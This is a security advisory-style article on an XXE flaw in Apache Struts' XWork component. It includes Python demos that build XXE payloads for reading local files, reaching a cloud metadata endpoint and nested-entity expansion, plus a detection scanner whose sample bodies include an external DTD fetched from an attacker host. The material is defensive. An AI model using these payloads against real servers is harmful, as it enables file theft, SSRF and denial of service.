Apache Struts XXE Flaw Exposes Enterprise Apps to Data Theft
CVE-2025-68493 in the XWork component enables XML External Entity attacks that can leak files, perform SSRF, or crash systems. Patch to version 6.1.1.
Apache has patched a critical XML External Entity (XXE) vulnerability in Struts 2, the widely deployed Java web application framework. CVE-2025-68493 affects the XWork component and could allow attackers to steal sensitive files, perform server-side request forgery, or trigger denial-of-service conditions.
The flaw carries a CVSS score of 9.8 and was identified by Zast AI, an autonomous AI security research system—marking one of the first critical enterprise vulnerabilities discovered primarily through automated AI analysis.
What's Vulnerable
The vulnerability exists in XWork, the command framework that underpins Struts. XWork fails to properly validate XML configuration data, allowing attackers to inject external entity references that the parser will resolve.
Affected versions span nearly the entire Struts 2 lineage:
| Version Range | Status |
|---|---|
| 2.0.0 - 2.2.1 (opensymphony:xwork) | End of life |
| 2.2.1 - 6.1.0 (xwork-core) | Patch available |
| 2.0.0 - 2.3.37 | End of life |
| 2.5.0 - 2.5.33 | End of life |
Three of the four listed ranges are end-of-life, meaning organizations running those versions face a difficult choice: upgrade to a supported release or accept permanent exposure.
Attack Scenarios
XXE vulnerabilities enable several attack patterns:
- File Disclosure: Attackers craft XML payloads whose external entity references point at local files such as /etc/passwd or application configuration files. The parser fetches the content and folds it into the document, and it then leaks through error messages or responses.
- Server-Side Request Forgery: External entity references can point to internal network resources, letting attackers probe internal services, reach cloud metadata endpoints, or interact with databases.
- Denial of Service: Nested entity definitions that expand exponentially (the "billion laughs" attack) exhaust memory and crash the application or the whole server.
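The three patterns above, as an added example that is not code from the Struts project or from the advisory. It is written in Python against the expat parser because expat exposes the same two switches that decide the outcome in any XML stack, the JAXP parsers a Java application uses included: whether a DOCTYPE is accepted at all, and whether the parser goes and fetches external entities. The secret file and its contents, the metadata URL and the attacker's payloads are constructed stand-ins, and the names parse, XxeRejected, demo_file_disclosure, demo_ssrf, demo_expansion and hardened_rejects are this example's own.

```python
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


class XxeRejected(Exception):
    """Raised by the hardened configuration as soon as a DOCTYPE appears."""


def parse(xml_bytes, allow_doctype):
    """Parse xml_bytes and return (text, fetched).

    text    - character data the application would go on to use
    fetched - every external system ID the parser asked to resolve

    allow_doctype=True models the permissive parser: the DTD is honoured and
    external general entities are resolved. file: targets are really read so
    the leak is visible; other schemes (the SSRF case) are only recorded so
    the example stays offline. allow_doctype=False models the hardened
    parser: it aborts at the DOCTYPE, before any entity can be declared.
    """
    text, fetched = [], []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype:
            raise XxeRejected("DOCTYPE %r not allowed" % name)

    def on_external_entity(context, base, system_id, public_id):
        fetched.append(system_id)
        target = urlparse(system_id)
        if target.scheme == "file":
            with open(target.path, "rb") as fh:          # file disclosure
                data = fh.read()
            # The bytes are parsed as entity content, so they become part of
            # the document text the application later echoes or logs.
            sub = parser.ExternalEntityParserCreate(context)
            sub.CharacterDataHandler = text.append
            sub.Parse(data, True)
        # A real parser would issue the HTTP request for other schemes here.
        return 1                                          # 0 aborts parsing

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_bytes, True)
    return "".join(text), fetched


def file_disclosure_payload(path):
    """Classic XXE: an external entity pointing at a local file (POSIX path)."""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file://%s">]>\n'
            '<r>&xxe;</r>' % path).encode()


# SSRF variant: the cloud instance-metadata address as the entity target.
SSRF_PAYLOAD = (b'<!DOCTYPE r [<!ENTITY xxe SYSTEM '
                b'"http://169.254.169.254/latest/meta-data/">]><r>&xxe;</r>')


def nested_entity_payload(depth=4, fanout=10, seed="lol"):
    """Scaled-down billion laughs: each layer references the one below it
    fanout times, so the root reference expands to fanout**depth * len(seed)."""
    decls = ['<!ENTITY e0 "%s">' % seed]
    for i in range(1, depth + 1):
        decls.append('<!ENTITY e%d "%s">' % (i, ("&e%d;" % (i - 1)) * fanout))
    return ('<!DOCTYPE r [%s]><r>&e%d;</r>' % ("".join(decls), depth)).encode()


def demo_file_disclosure():
    """Leak a constructed config file through the permissive parser.
    Returns (leaked_text, fetched_ids); the file is removed afterwards."""
    with tempfile.NamedTemporaryFile("w", suffix=".properties",
                                     delete=False) as fh:
        fh.write("db.password=hunter2\n")                # constructed secret
        path = fh.name
    try:
        return parse(file_disclosure_payload(path), allow_doctype=True)
    finally:
        os.unlink(path)


def demo_ssrf():
    """Return the URLs the permissive parser tried to fetch for the attacker."""
    return parse(SSRF_PAYLOAD, allow_doctype=True)[1]


def demo_expansion():
    """Return (payload_size, expanded_size) for the nested-entity document."""
    payload = nested_entity_payload()
    text, _ = parse(payload, allow_doctype=True)
    return len(payload), len(text)


def hardened_rejects(payload):
    """True when the hardened configuration refuses the document outright."""
    try:
        parse(payload, allow_doctype=False)
    except XxeRejected:
        return True
    return False
```

The hardened branch is the equivalent of setting the JAXP feature http://apache.org/xml/features/disallow-doctype-decl to true on a DocumentBuilderFactory or SAXParserFactory. Where an application genuinely needs a DTD, the fallback is to set http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false, which closes the file and SSRF cases but not the expansion case: a 264-byte document still produces 30,000 bytes of text here, which is why a separate entity-expansion limit (the JDK applies one by default) is still needed.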
Download Activity Shows Widespread Exposure
According to Sonatype, the affected component versions were downloaded over 380,000 times in the past week alone. This download volume indicates significant ongoing exposure across enterprise Java deployments.
Struts powers countless internal applications, customer portals, and back-office systems. Organizations often don't inventory their Struts usage until a vulnerability like Log4Shell forces emergency audits. Many may not realize CVE-2025-68493 affects them until exploitation attempts appear in logs.
Immediate Actions
- Upgrade to Struts 6.1.1, which contains the fix (Apache security bulletin S2-069)
- Inventory Struts deployments across development, staging, and production environments
- Review web application firewalls for XXE blocking rules and ensure they're active
- Disable DOCTYPE and external entity processing in the application's own XML parsers as defense in depth (in JAXP, set http://apache.org/xml/features/disallow-doctype-decl to true, or at minimum set http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false)
- Monitor for exploitation by searching logs for unusual XML parsing errors, request bodies that carry DOCTYPE or ENTITY declarations, and unexpected file reads or outbound connections from application servers
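A minimal indicator check for the firewall and monitoring items above, as an added example rather than a rule from the advisory or from any vendor. It scores raw XML request bodies for the structures XXE needs (a DOCTYPE, external or parameter entity declarations, sensitive targets) and statically estimates how far internal entities would expand, so a billion-laughs document is caught without ever being parsed. The sample bodies, the attacker host 203.0.113.5 (a documentation address) and the amplification threshold are constructed, and scan_xml_body, expansion_size and triage are this example's own names.

```python
import math
import re

# Structures XXE needs, plus targets worth flagging on their own.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[\w.\-]+)\s+"
    r"(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<ext>(?:SYSTEM|PUBLIC)\b[^>]*))\s*>",
    re.IGNORECASE)
ENTITY_REF_RE = re.compile(r"&([\w.\-]+);")
# file: URLs, the cloud instance-metadata address, and the classic probe file.
SENSITIVE_TARGET_RE = re.compile(r"file:|169\.254\.169\.254|/etc/passwd",
                                 re.IGNORECASE)
MAX_AMPLIFICATION = 10   # flag when an entity would expand to >10x the body


def expansion_size(name, decls, memo, active=()):
    """Bytes entity `name` yields once fully expanded (internal entities only).
    A self-referencing entity is illegal XML, but a parser may still burn
    time before rejecting it, so a cycle is scored as infinite."""
    if name in active:
        return math.inf
    if name in memo:
        return memo[name]
    value = decls.get(name)
    if value is None:            # predefined (&amp;), undeclared or external
        return 0
    size = len(ENTITY_REF_RE.sub("", value))
    for ref in ENTITY_REF_RE.findall(value):
        size += expansion_size(ref, decls, memo, active + (name,))
    memo[name] = size
    return size


def scan_xml_body(body):
    """Return the sorted indicator names found in one XML request body."""
    if not DOCTYPE_RE.search(body):
        return []                # without a DTD none of these patterns apply
    findings = {"doctype"}
    decls = {}
    for m in ENTITY_DECL_RE.finditer(body):
        if m.group("param"):
            findings.add("parameter_entity")
        if m.group("ext"):
            findings.add("external_entity")
        else:
            value = m.group("dq") if m.group("dq") is not None else m.group("sq")
            decls[m.group("name")] = value
    if SENSITIVE_TARGET_RE.search(body):
        findings.add("sensitive_target")
    memo = {}
    worst = max((expansion_size(n, decls, memo) for n in decls), default=0)
    if worst > MAX_AMPLIFICATION * len(body):
        findings.add("entity_expansion")
    return sorted(findings)


def triage(bodies):
    """Map each body name to its findings, dropping bodies with none."""
    result = {}
    for name, body in bodies.items():
        findings = scan_xml_body(body)
        if findings:
            result[name] = findings
    return result


# Constructed request bodies: one benign, one harmless DTD, four attacks.
SAMPLE_BODIES = {
    "benign_soap": ('<?xml version="1.0"?><soap:Envelope xmlns:soap='
                    '"http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
                    '<getOrder><id>42</id></getOrder></soap:Body></soap:Envelope>'),
    "internal_entity": ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY co '
                        '"Acme Corp">]><r>&co;</r>'),
    "file_read": ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM '
                  '"file:///etc/passwd">]><r>&xxe;</r>'),
    "ssrf_metadata": ('<!DOCTYPE r [<!ENTITY xxe SYSTEM '
                      '"http://169.254.169.254/latest/meta-data/">]><r>&xxe;</r>'),
    "oob_param_entity": ('<!DOCTYPE r [<!ENTITY % dtd SYSTEM '
                         '"http://203.0.113.5/evil.dtd"> %dtd;]><r/>'),
    "billion_laughs": ('<!DOCTYPE r [<!ENTITY e0 "lol">'
                       + "".join('<!ENTITY e%d "%s">' % (i, ("&e%d;" % (i - 1)) * 10)
                                 for i in range(1, 5))
                       + ']><r>&e4;</r>'),
}
```

Reporting a bare DOCTYPE as its own low-severity indicator is deliberate: the payloads a Struts action normally receives (form posts, JSON, SOAP without a DTD) have no reason to carry one, so at a WAF it is a cheap, low-noise block, while the remaining indicators separate an opportunistic probe from an attempt at exfiltration or denial of service.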
Organizations running end-of-life Struts versions face a harder path. The framework doesn't backport security fixes to unsupported releases, so upgrading to the current supported branch is the only complete mitigation.
The AI Discovery Angle
CVE-2025-68493 stands out as one of the first critical vulnerabilities in major enterprise software discovered by an AI system. Zast AI, credited in Apache's advisory, represents an emerging class of autonomous security research tools that can analyze codebases at scale.
For defenders, this signals a coming wave of AI-discovered vulnerabilities in legacy codebases that human researchers may have overlooked. Security teams should expect patch volumes to increase as these tools mature and attackers deploy similar capabilities offensively.
The discovery also demonstrates that even thoroughly audited frameworks like Struts can harbor critical flaws for years. The XWork component has been part of Struts since 2007—meaning this XXE weakness existed undetected for nearly two decades.